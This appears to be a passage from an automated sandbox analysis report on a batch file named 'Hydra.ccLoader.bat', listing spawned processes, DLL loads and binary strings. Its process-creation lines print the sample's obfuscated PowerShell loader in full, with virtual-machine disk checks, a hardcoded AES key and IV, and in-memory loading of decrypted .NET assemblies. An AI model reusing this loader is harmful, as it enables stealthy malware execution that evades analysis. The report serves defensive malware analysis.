'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\spoolsv.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Hydra.ccLoader.bat

Static file information: File size 7306960 > 1048576

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
